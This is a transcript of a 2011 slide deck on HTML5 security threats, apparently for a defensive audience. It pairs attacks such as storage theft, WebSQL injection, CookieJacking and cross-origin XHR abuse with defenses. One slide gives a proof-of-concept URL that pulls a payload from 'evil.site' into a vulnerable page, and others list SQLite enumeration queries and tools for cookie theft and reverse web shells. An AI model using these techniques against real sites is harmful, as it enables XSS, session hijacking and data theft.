Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Talk about html5 security

Avatar for ourren ourren
September 15, 2011

Talk about html5 security

html5 security

Avatar for ourren

ourren

September 15, 2011
Tweet

More Decks by ourren

Other Decks in Technology

Transcript

  1.  History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC

    1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation
  2.  Features  The three aspects of HTML5 ▪ Content

    HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc
  3.  XSS abuse with tags and attributes  Hiding URL

    Code  Stealing from the storage  Injecting and Exploiting WebSQL  ClickJacking &&CookieJacking  Cross Origin Request and postMessage  Client‐side File Includes  Botnet and widgets
  4.  In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for

    tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL  Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>
  5.  Attack:  New XSS Vector  Bypass Black-list Filter

     Defense:  Add new tags to Black-list  Change Regex
  6.  DOM  window.history.back();  window.history.forward();  window.history.go();  HTML5

     history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.
  7.  Type  LocalStorage:for long-term storage  SessionStorage:for the session

    application(last when the browser closed)  Differences  Cookies:4k  LocalStorage/ SessionStorage:depends on browser(usually 5MB)  Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
  8.  Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()

     (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear()
  9.  Attack  Get the data from the storage(cookie,passwd,etc) 

    Storage your xss shellcode  Unlimit the path  Defense  Don’t store sensitive data in local storage  Don't use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags
  10.  Database Storage  The same as the Google Gears

     Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql();  Type  SQLite (support by WebKit)
  11.  Attack  Store shellcode  SQL inject  Defense

     Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data
  12.  SQL Injection  Use sqlite_master ▪ SELECT name FROM

    sqlite_master WHERE type='table' ▪ SELECT sql FROM sqlite_master WHERE name='table_name' ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
  13.  Drag and drop basics  Drag Data  the

    drag feedback image  drag effects  Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend
  14.  CookieJacking  Use many technology to steal user’s local

    cookies  Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB
  15.  Defense  Use iframe with sandbox  If (top

    !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href
  16.  postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message",

    receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... }
  17.  Defense  Check the postMessage origin  Don’t use

    innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage
  18.  Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject

    to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc
  19.  Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ (Flash

    crossdomain.xml )  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request}
  20.  Code like this: <html><body><script> x = new XMLHttpRequest(); x.open("GET",location.hash.substring(1));

    x.onreadystatechange=function(){if(x.readyState==4){ document.getElementById("main").innerHTML=x.responseText;}} x.send(); </script> <div id=“main”></div> </body></html>  POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>  New type of XSS!!
  21.  Web Workers  running scripts in the background independently

     Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects
  22.  Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email

    Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address
  23.  HTML5CSdump  enumeration and extraction techniques described before to

    obtain all the client-side storage relative to a certain domain name  JS-Recon  Port Scans  Network Scans  Detecting private IP address
  24.  Imposter  Steal cookies  Set cookies  Steal

    Local Shared Objects  Steal stored passwords from FireFox  etc  Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures
  25.  Ravan  JavaScript based Distributed Computing system  hashing

    algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512
  26.  HTML5 带来的新安全威胁:xisigr  Attacking with HTML5:lavakumark  Abusing HTML5:Ming

    Chow  HTML5 Web Security:Thomas Röthlisberger  Abusing HTML 5 Structured Client-side Storage:Alberto Trivero  Cookiejacking:Rosario Valotta  http://heideri.ch/jso/#html5  http://www.wooyun.org/bugs/wooyun-2011-02351  http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html  http://www.html5test.com
  27.  http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html  http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox  http://code.google.com/intl/zh-CN/apis/gears/api_database.html  http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html

     http://www.w3.org/TR/access-control/  http://m-austin.com/blog/?p=19  https://developer.mozilla.org/en/  http://www.w3.org/TR/cors/  http://www.andlabs.org/tools/ravan.html  http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/